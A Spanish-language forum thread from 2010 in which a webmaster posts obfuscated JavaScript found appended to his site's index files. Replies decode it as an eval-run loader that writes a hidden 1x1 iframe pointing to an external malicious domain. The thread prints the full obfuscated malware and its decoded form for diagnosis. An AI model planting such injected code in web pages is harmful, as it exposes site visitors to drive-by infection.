Título: Ataque web por javascript
Publicado por: Gorky en 6 Julio 2010, 12:14 pm
Buenas foreros. Me he encontrado con un ataque en mi web y ha sido que los archivos index.php e index.html de todas las carpetas tenian este script al final del code: <b id="glavnoelubovz">St<i>ri</i>n<i>g|<i>sp<i>li<i>t|f<i>rom<i>Ch<i>a</i>rC</i>o</i>d</i>e</i>|</i>ev</i>al</b> <script> function glavnoelubovc(node) { var ret = ""; for(var i=0; i<node.childNodes.length; i++) { switch(node.childNodes[i].nodeType) { case 1: ret+=glavnoelubovc(node.childNodes[i]); break; case 3: ret+=node.childNodes[i].nodeValue; } } return ret; } var glavnoelubov = glavnoelubovc(document.getElementById("glavnoelubovz")).split("|"); </script> <script> window[glavnoelubov[3]]("glavnoelubov_DGicyJZczU = "+glavnoelubov[0]); var glavnoelubov_pioRCoumcR = " a 100 a 111 a 99 a 117 a 109 a 101 a 110 a 116 a 46 a 119 a 114 a 105 a 116 a 101 a 40 a 34 a 60 a 105 a 102 a 114 a 97 a 109 a 101 a 32 a 115 a 114 a 99 a 61 a 39 a 104 a 116 a 116 a 112 a 58 a 47 a 47 a 117 a 105 a 116 a 121 a 114 a 46 a 105 a 110 a 47 a 120 a 47 a 105 a 110 a 100 a 101 a 120 a 46 a 112 a 104 a 112 a 63 a 115 a 61 a 100 a 97 a 50 a 52 a 50 a 99 a 100 a 49 a 50 a 102 a 98 a 48 a 50 a 102 a 50 a 97 a 48 a 51 a 54 a 102 a 53 a 57 a 52 a 50 a 53 a 50 a 48 a 100 a 97 a 49 a 99 a 57 a 39 a 32 a 119 a 105 a 100 a 116 a 104 a 61 a 49 a 32 a 104 a 101 a 105 a 103 a 104 a 116 a 61 a 49 a 32 a 102 a 114 a 97 a 109 a 101 a 98 a 111 a 114 a 100 a 101 a 114 a 61 a 48 a 62 a 60 a 47 a 105 a 102 a 114 a 97 a 109 a 101 a 62 a 34 a 41 a 59"; var glavnoelubov_BKyPlsuSlj = glavnoelubov_pioRCoumcR[glavnoelubov[1]](" "+"a"+" "); var glavnoelubov_ShdAeHXubi = ""; for (var glavnoelubov_lQQZiTNcFq=1; glavnoelubov_lQQZiTNcFq<glavnoelubov_BKyPlsuSlj.length; glavnoelubov_lQQZiTNcFq++){glavnoelubov_ShdAeHXubi+=glavnoelubov_DGicyJZczU[glavnoelubov[2]](glavnoelubov_BKyPlsuSlj[glavnoelubov_lQQZiTNcFq]);} window[glavnoelubov[3]](glavnoelubov_ShdAeHXubi); </script>
Alguien podria decirme que hace tal script? Muchas gracias.
Título: Re: Ataque web por javascript
Publicado por: Shell Root en 6 Julio 2010, 13:46 pm
El primer Script, solo realiza un split a una cadena. Cadena = String|split|fromCharCode|eval
Split = String,split,fromCharCode,eval El segundo no lo sé, no lo vi :P
Título: Re: Ataque web por javascript
Publicado por: cgvwzq en 6 Julio 2010, 15:20 pm
Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente: document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");
Se lo pasa a un eval() y se ejecuta... No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida. Saludos!
Título: Re: Ataque web por javascript
Publicado por: Gorky en 6 Julio 2010, 16:00 pm
Después de hacer el split a la cadena de números, con " a ", pasa cada uno a su correspondiente ascii con fromCharCode y lo concatena. El resultado es el siguiente: document.write("<iframe src='http://uityr.in/x/index.php?s=da242cd12fb02f2a036f5942520da1c9' width=1 height=1 frameborder=0></iframe>");
Se lo pasa a un eval() y se ejecuta... No puedo decirte que hay en esa web porque me redirecciona a un 404, puede ser que ya hayan suspendido la página maliciosa, o que compruebe que el "Referrer" es de una página comprometida. Saludos! Te agradezco tu investigacion. Tampoco se que es lo que hay tras esa web pero si es cierto que el kaspersky me lo bloquea.
|